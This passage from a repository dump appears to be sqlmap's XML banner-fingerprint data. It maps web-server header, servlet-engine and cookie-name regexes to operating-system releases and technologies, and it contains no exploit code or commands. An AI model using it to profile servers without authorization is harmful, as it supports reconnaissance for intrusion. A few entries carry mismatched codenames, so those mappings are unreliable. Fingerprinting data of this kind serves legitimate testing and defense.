\\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.9\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.49 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.10\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.52 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.11\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.46 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"5.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.48 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"5.2.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.50 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"5.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.53 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"5.4\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.0 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"5.5|6.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.54 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"6.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"6.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.6 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"6.3|7.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.9 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"6.4|7.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.11 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"7.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.14 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"7.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.13 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"8.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.15 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"8.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.17 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"8.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.21 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"9.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.6 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"9.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.9 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"9.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.16 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"10.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.27 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"10.4\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.26 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"11.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.39 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"11.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.51 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"12.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.46 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"13.0\"/>\n    </regexp>\n\n    <!-- Apache: Mandrake / Mandriva -->\n\n    <regexp value=\"Apache/1\\.3\\.6 \\(Unix\\)\\s+\\(Mandrake/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"6.0\" codename=\"Venus\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.9 \\(Unix\\)\\s+\\(NetRevolution Advanced Server/Linux-Mandrake\\)\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"6.1|7.0\" codename=\"Helios|Air\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.12 \\(NetRevolution/Linux-Mandrake\\)\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"7.1\" codename=\"Helium\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.14 \\(Linux-Mandrake/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"7.2\" codename=\"Odyssey\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.19 \\(Linux-Mandrake/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"8.0\" codename=\"Traktopel\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.20 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"8.1\" codename=\"Vitamin\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.23 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"8.2\" codename=\"Bluebird\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.26 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"9.0\" codename=\"Dolphin\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.27 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"9.1\" codename=\"Bamboo\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/2\\.0\\.44 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"9.1\" codename=\"Bamboo\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.28 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"9.2\" codename=\"FiveStar\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/2\\.0\\.47 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"9.1|9.2\" codename=\"Bamboo|FiveStar\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.29 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"10.0\" codename=\"Community\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/2\\.0\\.48 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"10.0\" codename=\"Community\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/1\\.3\\.31 \\(Linux-Mandrake/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"10.1\" codename=\"Official\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/2\\.0\\.50 \\(Mandrake Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"10.0|10.1\" codename=\"Community|Official\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/2\\.0\\.53 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandrake\" release=\"10.2\" codename=\"Limited Edition 2005\"/>\n    </regexp>\n\n    <regexp value=\"Apache-AdvancedExtranetServer/2\\.0\\.54 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2006.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2007\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.4 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2007.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.6 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2008\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.8 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2008.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.9 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2009\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.11 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2009.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.14 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2010\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.15 \\(Mandriva Linux/\">\n        <info type=\"Linux\" distrib=\"Mandriva\" release=\"2010.1|2010.2\"/>\n    </regexp>\n\n    <!-- Apache: Red Hat -->\n\n    <regexp value=\"Apache/1\\.1\\.3 Red Hat\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"4.2\" codename=\"Biltmore\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.2\\.4 Red Hat\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"5.0\" codename=\"Hurricane\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.2\\.6 Red Hat\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"5.1\" codename=\"Manhattan\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.3 \\(Unix\\)\\s+\\(Red Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"5.2\" codename=\"Apollo\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.6 \\(Unix\\)\\s+\\(Red Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"6.0\" codename=\"Hedwig\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.9 \\(Unix\\)  \\(Red Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"6.1\" codename=\"Cartman\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.12 \\(Unix\\)  \\(Red Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"6.2|7.0\" codename=\"Zoot|Guinness\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.19 \\(Unix\\)  \\(Red-Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"7.1\" codename=\"Seawolf\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.20 \\(Unix\\)  \\(Red-Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"7.2\" codename=\"Enigma\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.23 \\(Unix\\)  \\(Red-Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"7.3\" codename=\"Valhalla\"/>\n    </regexp>\n\n \t<regexp value=\"Apache/1\\.3\\.27 \\(Unix\\)  \\(Red-Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"7.1|7.2|7.3\" codename=\"Seawolf|Enigma|Valhalla\" updated=\"True\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.40 \\(Red Hat Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"8.0|9\" codename=\"Psyche|Shrike\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.22 \\(Unix\\)  \\(Red-Hat/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"Enterprise 2.1\" codename=\"Panama\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.46 \\(Red Hat\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"Enterprise 3\" codename=\"Taroon\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.52 \\(Red Hat\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"Enterprise 4\" codename=\"Nahant\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(Red Hat\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"Enterprise 5\" codename=\"Tikanga\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.15 \\(Red Hat\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"Enterprise 6\" codename=\"Santiago\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.6 \\(Red Hat\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"Enterprise 7\" codename=\"Maipo\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.37 \\(Red Hat\\)\">\n        <info type=\"Linux\" distrib=\"Red Hat\" release=\"Enterprise 8\" codename=\"Ootpa\"/>\n    </regexp>\n\n    <!-- Apache: SuSE -->\n\n    <regexp value=\"Apache/1\\.3\\.6 \\(Unix\\) \\(SuSE/Linux\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"6.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.9 \\(Unix\\) \\(SuSE/Linux\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"6.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.12 \\(Unix\\) \\(SuSE/Linux\\)\">\n        <info technology=\"operating-system.type\" type=\"str\" value=\"Linux\"/>\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"6.4|7.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.17 \\(Unix\\) \\(SuSE/Linux\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"7.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.19 \\(Unix\\) \\(SuSE/Linux\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"7.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.20 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"7.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.23 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"8.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.26 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"8.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.27 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"8.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.28 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"9.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.40 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"8.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.44 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"8.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.47 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"9.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.49 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"9.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.50 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"9.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.53 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"9.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.54 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"10.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.0 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"10.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"10.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.4 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"10.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.8 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"11.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.10 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"11.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.13 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"11.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.15 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"11.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.17 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"11.4\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.21 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"12.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.22 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"12.2|12.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.6 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"13.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.10 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"13.2\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.16 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"42.1\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.23 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"42.2|42.3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.33 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"15\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.43 \\(Linux/SuSE\\)\">\n        <info type=\"Linux\" distrib=\"SuSE\" release=\"15.3\"/>\n    </regexp>\n\n    <!-- Apache: Ubuntu -->\n\n    <regexp value=\"Apache/2\\.0\\.50 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"4.10\" codename=\"Warty Warthog\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.53 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"5.04\" codename=\"Hoary Hedgehog\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.54 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"5.10\" codename=\"Breezy Badger\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.55 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"6.06|6.10\" codename=\"Dapper Drake|Edgy Eft\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"7.04\" codename=\"Feisty Fawn\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.4 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"7.10\" codename=\"Gutsy Gibbon\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.8 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"8.04\" codename=\"Hardy Heron\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.9 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"8.10\" codename=\"Intrepid Ibex\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.11 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"9.04\" codename=\"Jaunty Jackalope\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.12 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"9.10\" codename=\"Karmic Koala\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.14 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"10.04\" codename=\"Lucid Lynx\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.16 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"10.10\" codename=\"Maverick Meerkat\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.17 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"11.04\" codename=\"Natty Narwhal\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.20 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"11.10\" codename=\"Oneiric Ocelot\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.22 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"12.04|12.10|13.04\" codename=\"Precise Pangolin|Quantal Quetzal|Raring Ringtail\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.6 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"13.10\" codename=\"Saucy Salamander\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.10 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"14.10|15.04\" codename=\"utopic|vivid\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.12 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"15.10\" codename=\"willy\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.18 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"16.04|16.10\" codename=\"xenial|yakkety\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.25 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"17.04\" codename=\"zesty\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.27 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"17.10\" codename=\"artful\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.29 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"18.04\" codename=\"bionic\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.34 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"18.10\" codename=\"cosmic\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.38 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"19.04\" codename=\"disco\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.41 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"19.10|20.04|20.10\" codename=\"eoan|focal\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.46 \\(Ubuntu\\)\">\n        <info type=\"Linux\" distrib=\"Ubuntu\" release=\"21.04|21.10\" codename=\"eoan|focal\"/>\n    </regexp>\n\n    <!-- Nginx -->\n\n    <regexp value=\"nginx$\">\n        <info technology=\"Nginx\"/>\n    </regexp>\n\n    <regexp value=\"nginx/([\\w\\.]+)\">\n        <info technology=\"Nginx\" tech_version=\"1\"/>\n    </regexp>\n\n    <!-- Google Web Server -->\n\n    <regexp value=\"GWS$\">\n        <info technology=\"Google Web Server\"/>\n    </regexp>\n\n    <regexp value=\"GWS/([\\w\\.]+)\">\n        <info technology=\"Google Web Server\" tech_version=\"1\"/>\n    </regexp>\n\n    <!-- lighttpd -->\n\n    <regexp value=\"lighttpd$\">\n        <info technology=\"lighttpd\"/>\n    </regexp>\n\n    <regexp value=\"lighttpd/([\\w\\.]+)\">\n        <info technology=\"lighttpd\" tech_version=\"1\"/>\n    </regexp>\n\n    <!-- OpenResty -->\n\n    <regexp value=\"openresty$\">\n        <info technology=\"OpenResty\"/>\n    </regexp>\n\n    <regexp value=\"openresty/([\\w\\.]+)\">\n        <info technology=\"OpenResty\" tech_version=\"1\"/>\n    </regexp>\n\n    <!-- LiteSpeed -->\n\n    <regexp value=\"LiteSpeed$\">\n        <info technology=\"LiteSpeed\"/>\n    </regexp>\n\n    <regexp value=\"LiteSpeed/([\\w\\.]+)\">\n        <info technology=\"LiteSpeed\" tech_version=\"1\"/>\n    </regexp>\n\n    <!-- Sun ONE -->\n\n    <regexp value=\"Sun-ONE-Web-Server/([\\w\\.]+)\">\n        <info technology=\"Sun ONE\" tech_version=\"1\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/servlet-engine.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!-- Reference: http://www.http-stats.com/Servlet-Engine -->\n\n<root>\n    <regexp value=\"Tomcat( Web Server)?\\/([\\d\\.]+)\">\n        <info technology=\"Tomcat\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Enhydra Application Server/([\\d\\.]+)\">\n        <info technology=\"Enhydra\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Jetty/([\\d\\.]+)\">\n        <info technology=\"Jetty\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"JSP[\\-\\_\\/\\ ]([\\d\\.]+)\">\n        <info technology=\"JSP\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Servlet[\\-\\_\\/\\ ]([\\d\\.]+)\">\n        <info technology=\"Servlet\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Java[\\-\\_\\/\\ ]([\\d\\.]+)\">\n        <info technology=\"Java\" tech_version=\"1\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/set-cookie.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!--\n     References:\n     * http://www.http-stats.com/Set-Cookie2\n     * http://www.owasp.org/index.php/Category:OWASP_Cookies_Database\n-->\n\n<root>\n    <regexp value=\"ASPSESSIONID\">\n        <info technology=\"ASP\" type=\"Windows\"/>\n    </regexp>\n\n    <regexp value=\"ASP\\.NET_SessionId|\\.ASPXAUTH\">\n        <info technology=\"ASP.NET\" type=\"Windows\"/>\n    </regexp>\n\n    <regexp value=\"JSESSIONID\">\n        <info technology=\"JSP\"/>\n    </regexp>\n\n    <regexp value=\"JServSessionId\">\n        <info technology=\"JServ\"/>\n    </regexp>\n\n    <regexp value=\"Ltpatoken\">\n        <info technology=\"WebSphere\"/>\n    </regexp>\n\n    <regexp value=\"PHPSESS\">\n        <info technology=\"PHP\"/>\n    </regexp>\n\n    <regexp value=\"RoxenUserID\">\n        <info technology=\"Roxen\"/>\n    </regexp>\n\n    <regexp value=\"wiki\\d+_session\">\n        <info technology=\"MediaWiki\"/>\n    </regexp>\n\n    <regexp value=\"Apache\">\n        <info technology=\"Apache\"/>\n    </regexp>\n\n    <regexp value=\"DomAuthSessID\">\n        <info technology=\"Domino|Notes\"/>\n    </regexp>\n\n    <regexp value=\"CFID|CFTOKEN|CFMAGIC|CFGLOBALS\">\n        <info technology=\"ColdFusion\"/>\n    </regexp>\n\n    <regexp value=\"WebLogicSession\">\n        <info technology=\"WebLogic\"/>\n    </regexp>\n\n    <regexp value=\"MoodleSession\">\n        <info technology=\"Moodle\"/>\n    </regexp>\n\n    <regexp value=\"\\bwp_\">\n        <info technology=\"WordPress\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/sharepoint.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!-- Reference: http://www.http-stats.com/Set-Cookie2 -->\n\n<root>\n    <regexp value=\"([\\d\\.]+)\">\n        <info technology=\"Microsoft Share Point\" tech_version=\"1\" type=\"Windows\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/x-aspnet-version.xml",
